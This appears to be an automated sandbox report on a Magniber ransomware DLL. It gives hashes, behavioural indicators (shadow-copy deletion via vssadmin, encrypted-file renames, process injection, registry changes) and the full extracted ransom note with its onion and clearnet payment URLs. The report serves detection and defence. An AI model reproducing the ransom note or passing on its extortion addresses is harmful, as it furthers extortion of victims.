magniber | ebbeda3b2a8e85665879757b0fa2536965b0c63440a8c7a4bb1e774278c45e56

Analysis

max time kernel
151s
max time network
152s
platform
windows10_x64
resource
win10-en-20211104
submitted
09/11/2021, 07:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tfhga.dll
Size

38KB
MD5

92fda071dde71386a8797f85f7985b1f
SHA1

5f0cf9294f1cd0959bfd805a6286dce97c9390ea
SHA256

ebbeda3b2a8e85665879757b0fa2536965b0c63440a8c7a4bb1e774278c45e56
SHA512

ae6b9a0fe744a6358bdc64bcb768f079b778388c1046a4c2ea1c33ff8b271586ec4dba3c57c9f78ab6c0e52a8d9ac7c83c0b44e421a76fa202031223a1304a26

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://1094f0c0225852c0egqzhlie.7hibj3fp6jlp52q2m4lv6thx2lr34itaayiydby2axofaql54dung3ad.onion/gqzhlie Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://1094f0c0225852c0egqzhlie.dearbet.sbs/gqzhlie http://1094f0c0225852c0egqzhlie.oddson.quest/gqzhlie http://1094f0c0225852c0egqzhlie.legcore.space/gqzhlie http://1094f0c0225852c0egqzhlie.hateme.uno/gqzhlie Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://1094f0c0225852c0egqzhlie.7hibj3fp6jlp52q2m4lv6thx2lr34itaayiydby2axofaql54dung3ad.onion/gqzhlie

http://1094f0c0225852c0egqzhlie.dearbet.sbs/gqzhlie

http://1094f0c0225852c0egqzhlie.oddson.quest/gqzhlie

http://1094f0c0225852c0egqzhlie.legcore.space/gqzhlie

http://1094f0c0225852c0egqzhlie.hateme.uno/gqzhlie

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4936	4968	cmd.exe	81
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4944	4968	vssadmin.exe	81
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	4968	cmd.exe	81

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 11 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\MergeStart.raw => C:\Users\Admin\Pictures\MergeStart.raw.gqzhlie	rundll32.exe
File renamed	C:\Users\Admin\Pictures\AssertRepair.png => C:\Users\Admin\Pictures\AssertRepair.png.gqzhlie	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\HideSplit.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\HideSplit.tiff => C:\Users\Admin\Pictures\HideSplit.tiff.gqzhlie	rundll32.exe
File renamed	C:\Users\Admin\Pictures\PopWrite.tiff => C:\Users\Admin\Pictures\PopWrite.tiff.gqzhlie	rundll32.exe
File renamed	C:\Users\Admin\Pictures\WatchBlock.tif => C:\Users\Admin\Pictures\WatchBlock.tif.gqzhlie	rundll32.exe
File renamed	C:\Users\Admin\Pictures\CloseSave.raw => C:\Users\Admin\Pictures\CloseSave.raw.gqzhlie	rundll32.exe
File renamed	C:\Users\Admin\Pictures\RedoUse.raw => C:\Users\Admin\Pictures\RedoUse.raw.gqzhlie	rundll32.exe
File renamed	C:\Users\Admin\Pictures\LimitSubmit.tif => C:\Users\Admin\Pictures\LimitSubmit.tif.gqzhlie	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\PopWrite.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\WatchTrace.tif => C:\Users\Admin\Pictures\WatchTrace.tif.gqzhlie	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe
PID 2140 set thread context of 0	2140	rundll32.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4944	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead\Cach = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "256"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\IECompatCache"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "MicrosoftEdge\\User\\Default\\EmieUserList"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "MicrosoftEdge\\IECompatCache"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CacheRepair = "0"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "265"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead\Cach = "MicrosoftEdge_ieflipahead:"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b94eb1fcd2d4d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead\Cach = "768"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_DNTException\Cac = "MicrosoftEdge_DNTException:"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieUserList\Cac = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\EmieUserList"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "121"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "343172082"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CacheOptions = "9"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CacheRe = "0"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead\Cach = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IEFlipAheadCache"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieUserList\Cac = "0"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\RACProvisionStatus-001 = "1"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 7078c15961e9d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "MicrosoftEdge_iecompatua:"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CachePa = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\User\\Default\\EmieSiteList"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CacheLimit = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1432	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2140	rundll32.exe
2140	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
396	Process not Found

Suspicious behavior: MapViewOfSection 10 IoCs

pid	Process
2140	rundll32.exe
2140	rundll32.exe
2140	rundll32.exe
2140	rundll32.exe
2140	rundll32.exe
2140	rundll32.exe
2140	rundll32.exe
2140	rundll32.exe
4184	MicrosoftEdgeCP.exe
4184	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
